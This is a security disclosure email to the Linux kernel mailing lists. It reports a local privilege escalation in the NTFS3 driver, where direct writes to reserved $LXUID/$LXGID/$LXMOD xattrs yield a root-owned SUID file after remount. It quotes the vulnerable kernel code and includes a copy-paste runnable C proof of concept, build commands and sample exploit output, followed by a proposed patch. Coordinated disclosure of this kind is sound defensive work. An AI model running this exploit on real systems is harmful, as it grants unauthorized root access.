From nobody Mon Jun  8 06:40:03 2026
Received: from mail-ej1-f68.google.com (mail-ej1-f68.google.com
 [209.85.218.68])
	(using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits))
	(No client certificate requested)
	by smtp.subspace.kernel.org (Postfix) with ESMTPS id 21918318B96
	for <linux-kernel@vger.kernel.org>; Sat,  6 Jun 2026 10:55:15 +0000 (UTC)
Authentication-Results: smtp.subspace.kernel.org;
 arc=pass smtp.client-ip=209.85.218.68
ARC-Seal: i=2; a=rsa-sha256; d=subspace.kernel.org; s=arc-20240116;
	t=1780743317; cv=pass;
 b=Z/MbZ/BPbswvfgDRuRxNSZp3f4MNoGp06hnR7quNxSEKs57Y42quDqQHEJp2p2G1PbfC97Cd/+I3MShz5iedBajwx9xfJ6wPMIILRud1wFeK7BgBSXtK+Q1/dJeKMq2rFwLO4/pMR5iKTKhtdrvZ2KhiqGR2m2ek24Gd4vbqJf4=
ARC-Message-Signature: i=2; a=rsa-sha256; d=subspace.kernel.org;
	s=arc-20240116; t=1780743317; c=relaxed/simple;
	bh=Nr0aL3ufU4v687psmAxfFRNGsw7CFcsk7oWpQh3kc2w=;
	h=MIME-Version:From:Date:Message-ID:Subject:To:Cc:Content-Type;
 b=YbPNr0EobP6pY5054MzG6J66I7Q992RqQcFKQuRqWhWPjItYVFaywfSXjvV8dGE9Fgv+xHqSPox2e5aT9hoPB8AKV04PFkFu8+U8w233syM2OxYVqFVqz/7BWypfxr+jsyteRt97hCawXm7ySE8ee1Kaz8p0Rw9l4v3g69X993E=
ARC-Authentication-Results: i=2; smtp.subspace.kernel.org;
 dmarc=pass (p=none dis=none) header.from=gmail.com;
 spf=pass smtp.mailfrom=gmail.com;
 dkim=pass (2048-bit key) header.d=gmail.com header.i=@gmail.com
 header.b=F5UFdUSS; arc=pass smtp.client-ip=209.85.218.68
Authentication-Results: smtp.subspace.kernel.org;
 dmarc=pass (p=none dis=none) header.from=gmail.com
Authentication-Results: smtp.subspace.kernel.org;
 spf=pass smtp.mailfrom=gmail.com
Authentication-Results: smtp.subspace.kernel.org;
	dkim=pass (2048-bit key) header.d=gmail.com header.i=@gmail.com
 header.b="F5UFdUSS"
Received: by mail-ej1-f68.google.com with SMTP id
 a640c23a62f3a-becfa735b9aso387513166b.1
        for <linux-kernel@vger.kernel.org>;
 Sat, 06 Jun 2026 03:55:15 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1780743314; cv=none;
        d=google.com; s=arc-20240605;
        b=AC7nbut6s31p7v5jB0vJtGyiMrakcAVeaBdQnxbGyrKNxF1Bw3BdO/f5hoC6puFSbI
         rk8A754Aon4vFhHR/GeeDW/zO1eFGpb7wYLAbV1TDX/p5DoqjRRkIIhvu/AxKsSFluFx
         av6ZPgAaBHThqGoY01T+mR/66ft/KHeJAAPXYK28nOEZO53SdtvfFgJkilGmM2N6zqwi
         6GHF6HorwI8nC6DpUhMIswEN+yvZ5d1CbjniSZQ1auYAT5K4HqXt3oM0HwklUNB4J5E3
         T/KcemJodcLA4fKrSGm/WnrPjmeMnypS17hVG+5glGaRGTRQnedJWKoTM+FMr2iQAmX3
         BWzw==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com;
 s=arc-20240605;
        h=cc:to:subject:message-id:date:from:mime-version:dkim-signature;
        bh=ZR2ZuAneQM6fddwhQe4SWdJ4RcBgvZspXP6uGMhFQUI=;
        fh=ZDuF2gVCeuulz5QlXLxFY2EOczdcLdYTuVAm7VfAsQ8=;
        b=hWWyRvLDW+xJcnyi8ZYAxXa9Shzy8zQIBuq4Hie7f4mlaBQJ+OuIg9ZjuSZE3+F6IQ
         6EJTYEJ9SozOYldHeEDHkGjMFONnQSlhDvU2DCPGCYNktEaIjGrPSPjwtvhXIXOYwl8f
         QPemNpyFZmZpBwPgJUB+LkHxH2TtF8zCJwAcSWxkhOXoPlVrcr3hVk78TZgXzJRGk+eq
         pqHkjNBtqOJTc7vbzxNr1E66s98GxYLb78xMq1KrpszTcOZ5/lavUkeR5YochjvHTImG
         IC0cJWPi6vm7fSo3y/P0RfoZttXAYcSi7WNGXyFKOvDKchr5PRt5Pirn3JIFWLDT+9dz
         p4uQ==;
        darn=vger.kernel.org
ARC-Authentication-Results: i=1; mx.google.com; arc=none
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=20251104; t=1780743314; x=1781348114;
 darn=vger.kernel.org;
        h=cc:to:subject:message-id:date:from:mime-version:from:to:cc:subject
         :date:message-id:reply-to;
        bh=ZR2ZuAneQM6fddwhQe4SWdJ4RcBgvZspXP6uGMhFQUI=;
        b=F5UFdUSSsFUw3r6mQcRLYOwtopY+zaaKktP3kPWDCxxKSYzEeNrVS93ZlxYUm+ThS3
         kvGTMhdRfnnYU41CJ6fogFRANaB4pUJDJnN1ScxA6Al8FdFKj74RPLtfRia2/kXOv/zc
         wxzZqwlHOLLTxZw2a2DQlwI7UZCbD0rRvlQ961BGJ4I9R6Gl/MZkW2AgSOZos9IjTmOy
         J7bGr7fHUrPsPg27HZiyxnFH0wMr79AJyFaRRo2WBZyp+15YebaTum6o8t1OGXSkiC9a
         4PMgkitA39eYweG9SSGDePY71CVOEuLvWWI2iyYjEsZj+7WSqnZYuAHN+mwaf27NlcZR
         Lm6A==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20251104; t=1780743314; x=1781348114;
        h=cc:to:subject:message-id:date:from:mime-version:x-gm-gg
         :x-gm-message-state:from:to:cc:subject:date:message-id:reply-to;
        bh=ZR2ZuAneQM6fddwhQe4SWdJ4RcBgvZspXP6uGMhFQUI=;
        b=Hxfbr3N/h24akN3uKwyo318Unm8w8ok8SNJZmzBty9LNImwPbc8ty7x6jIuWcaTrgL
         BtXpiPncf6ykX43ng2+FI3nlkeLFh/M2t1q9uTdibKbk2rQikp7+0ELSJhAmOEPWRulM
         V3qiTT5O3CCyhaRPfxgvykR/ZTOSKHmu8Z+EU9rOkD4m/y/GlyAn8D/x7r5zGR10P5wC
         atNb9NXGPycMOlzjjCZXGWdg+Kha1to5PLuRqwVAGNQa5h+9RidO8BDmOtbtDInD/jUW
         +YKv7rw4Iquhr90JqP+7Vz5v74TEGSeDX3fzUcNWYdAq1RWs8pEAXXzEZ5PHqLY03ff8
         ma8g==
X-Forwarded-Encrypted: i=1;
 AFNElJ9tN2M6J3oQxbq+s6zlSV7xAG4lIHgvn7BHCRTj4mMfLkb9htYVs97qP7ILlv5i14LQx9qy6uVBaB/UZb0=@vger.kernel.org
X-Gm-Message-State: AOJu0YzVcLOzxXT6rK6w8+Q5Q6ZHCc5koTeoqVZZAZwipA065N9EQeba
	0HEvrUDHu+zX58FUO53RXICTe0SH7LFbgwf1JPfl/Ki/juV8hhipaQtFoNV73WHKpImasJD9hXc
	OQfavxZZZHe6Gv5U37+NSktJ3lOtFiZA=
X-Gm-Gg: Acq92OFhxjoMX/XJzTQNvEDHYx3ydML7AbU5G+SepzN6hk0PItIhQU3gzbLQC/16Af7
	Acneoj96cisD0Zjan+5TQ/N9pYfIcu3Fj2vIWQgwDYmFC5uz+xrucllGRqS6qN92KT7BfTOSe0Q
	rI7Fy1n4dTrejcsSh30KLtYwvOE1cuMNk6X+L7Jqn+Oix90hfqs8S70Z1cRPOKxD8VbBKidPUlV
	SpWYLczGtDSgDrLxRf5FKfHzwLY/UdsA/Kuz8B5zMV5HKaZvsb1XK/5kk91OPMA4F0I2MeGHs4g
	Z8ETM51oqP2zhGyelMM=
X-Received: by 2002:a17:907:72c9:b0:bd3:1a18:cc64 with SMTP id
 a640c23a62f3a-bf37264180dmr390682966b.31.1780743314018; Sat, 06 Jun 2026
 03:55:14 -0700 (PDT)
Precedence: bulk
X-Mailing-List: linux-kernel@vger.kernel.org
List-Id: <linux-kernel.vger.kernel.org>
List-Subscribe: <mailto:linux-kernel+subscribe@vger.kernel.org>
List-Unsubscribe: <mailto:linux-kernel+unsubscribe@vger.kernel.org>
MIME-Version: 1.0
From: sdj asj <sdjasjbuaa@gmail.com>
Date: Sat, 6 Jun 2026 18:57:01 +0800
X-Gm-Features: AVVi8CcmZpqE--sCqHVRF70CY1qNwXKrLbO0mu00aTXZ23ra1ArF8ybJunu60eM
Message-ID: 
 <CAFTRC0=MDbnsNtb4-p7v4Hy9P-U4PsJuWv7s4MX0aEZcMxDVHw@mail.gmail.com>
Subject: [SECURITY] ntfs3: direct $LX* xattr writes can create a root SUID
 file
To: almaz.alexandrovich@paragon-software.com
Cc: ntfs3@lists.linux.dev, linux-kernel@vger.kernel.org, security@kernel.org
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Hello,

Summary

I found a syscall-reachable local privilege escalation in NTFS3.

Affected tree:
- reproduced on e8c2f9fda

The bug is in the xattr write + inode reload path:

1. On e8c2f9fda, direct userspace writes to $LXUID/$LXGID/$LXMOD were
accepted by ntfs_setxattr().

   In the vulnerable tree, unknown names fall through to ntfs_set_ea():

  971 /* Deal with NTFS extended attribute. */
  972 err =3D ntfs_set_ea(inode, name, strlen(name), value, size, flags, 0,
  973       NULL);

   There was no check blocking direct userspace writes to reserved $LX* xat=
trs,
   so a file owner could write arbitrary $LXUID/$LXGID/$LXMOD values.

2. On inode reload, ntfs_get_wsl_perm() trusts those xattrs as authoritative
   uid/gid/mode metadata:

  1037  if (ntfs_get_ea(inode, "$LXUID", sizeof("$LXUID") - 1, &value[0],
  1038      sizeof(value[0]), &sz) =3D=3D sizeof(value[0]) &&
  1039      ntfs_get_ea(inode, "$LXGID", sizeof("$LXGID") - 1, &value[1],
  1040      sizeof(value[1]), &sz) =3D=3D sizeof(value[1]) &&
  1041      ntfs_get_ea(inode, "$LXMOD", sizeof("$LXMOD") - 1, &value[2],
  1042      sizeof(value[2]), &sz) =3D=3D sizeof(value[2])) {
  1043    i_uid_write(inode, (uid_t)le32_to_cpu(value[0]));
  1044    i_gid_write(inode, (gid_t)le32_to_cpu(value[1]));
  1045    inode->i_mode =3D le32_to_cpu(value[2]);

3. That reload is reached from inode load in fs/ntfs3/inode.c:

  373 case ATTR_EA_INFO:
  380   inode->i_mode =3D mode;
  381   ntfs_get_wsl_perm(inode);
  382   mode =3D inode->i_mode;

As a result, a file owner on a writable NTFS3 mount can set:

- $LXUID =3D 0
- $LXGID =3D 0
- $LXMOD =3D S_IFREG | 04755

then force inode reload by remount/eviction and obtain a root-owned SUID fi=
le.

This does not require a malformed filesystem image. Normal syscalls only.

PoC

The core userspace trigger is just direct setxattr() on $LXUID/$LXGID/$LXMOD
followed by inode reload. The following is copy/paste runnable on a vulnera=
ble
kernel if /mnt/ntfs3 is a writable NTFS3 mount:

cat >/tmp/ntfs3_lxperm_poc.c <<'EOF'
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/xattr.h>
#include <unistd.h>

static void die(const char *msg)
{
  perror(msg);
  exit(1);
}

int main(void)
{
  const char *target =3D "/mnt/ntfs3/lxperm_suid";
  struct stat st;
  uint32_t uid =3D 0;
  uint32_t gid =3D 0;
  uint32_t mode =3D S_IFREG | 04755;
  int fd;

  unlink(target);
  fd =3D open(target, O_CREAT | O_WRONLY | O_TRUNC, 0755);
  if (fd < 0)
    die("open target");
  if (write(fd, "#!/bin/sh\nid\n", 12) !=3D 12)
    die("write target");
  if (fchown(fd, 1000, 1000))
    die("fchown target");
  if (fchmod(fd, 0755))
    die("fchmod target");
  close(fd);

  if (setgid(1000))
    die("setgid");
  if (setuid(1000))
    die("setuid");

  if (setxattr(target, "$LXUID", &uid, sizeof(uid), 0))
    die("setxattr $LXUID");
  if (setxattr(target, "$LXGID", &gid, sizeof(gid), 0))
    die("setxattr $LXGID");
  if (setxattr(target, "$LXMOD", &mode, sizeof(mode), 0))
    die("setxattr $LXMOD");

  printf("setxattr done, now remount the filesystem to force inode reload:\=
n");
  printf("  mount | grep ' /mnt/ntfs3 '\n");
  printf("  umount /mnt/ntfs3 && mount -t ntfs3 <device> /mnt/ntfs3\n");
  printf("Then run:\n");
  printf("  stat %s\n", target);
  printf("  %s\n", target);

  if (stat(target, &st))
    die("stat target");
  printf("before reload: uid=3D%u gid=3D%u mode=3D%04o\n",
         (unsigned)st.st_uid, (unsigned)st.st_gid, st.st_mode & 07777);
  return 0;
}
EOF
gcc -O2 -Wall -Wextra -o /tmp/ntfs3_lxperm_poc /tmp/ntfs3_lxperm_poc.c
/tmp/ntfs3_lxperm_poc

After remount on the vulnerable tree, the success condition is:
- stat shows uid=3D0 gid=3D0 mode=3D4755 for /mnt/ntfs3/lxperm_suid
- executing the file as uid 1000 runs with euid 0

For reference, the original end-to-end PoC on the vulnerable tree produced:

  before attack: uid=3D1000 gid=3D1000 mode=3D0755
  attacker uid=3D1000 euid=3D1000 setting $LX* xattrs
  after setxattr before reload: uid=3D1000 gid=3D1000 mode=3D0755
  after remount: uid=3D0 gid=3D0 mode=3D4755
  helper real_uid=3D1000 effective_uid=3D0
  RESULT: confirmed - unprivileged $LX* xattrs produced a root SUID executa=
ble

Patch

Proposed fix:

[PATCH] ntfs3: reject direct userspace writes to reserved $LX* xattrs

diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
index 9eeac0ab2..0bc633025 100644
--- a/fs/ntfs3/xattr.c
+++ b/fs/ntfs3/xattr.c
@@ -851,6 +851,14 @@ static int ntfs_getxattr(const struct
xattr_handler *handler, struct dentry *de,
  return err;
 }

+static bool ntfs_is_reserved_lxattr(const char *name)
+{
+ return !strcmp(name, "$LXUID") ||
+        !strcmp(name, "$LXGID") ||
+        !strcmp(name, "$LXMOD") ||
+        !strcmp(name, "$LXDEV");
+}
+
 /*
  * ntfs_setxattr - inode_operations::setxattr
  */
@@ -955,6 +963,11 @@ static noinline int ntfs_setxattr(const struct
xattr_handler *handler,
    goto out;
  }

+ if (ntfs_is_reserved_lxattr(name)) {
+   err =3D -EPERM;
+   goto out;
+ }
+
  /* Deal with NTFS extended attribute. */
  err =3D ntfs_set_ea(inode, name, strlen(name), value, size, flags, 0,
        NULL);

This report was prepared with AI assistance, so I am treating it as public
per Documentation/process/security-bugs.rst.

Thanks,
Zhen Yan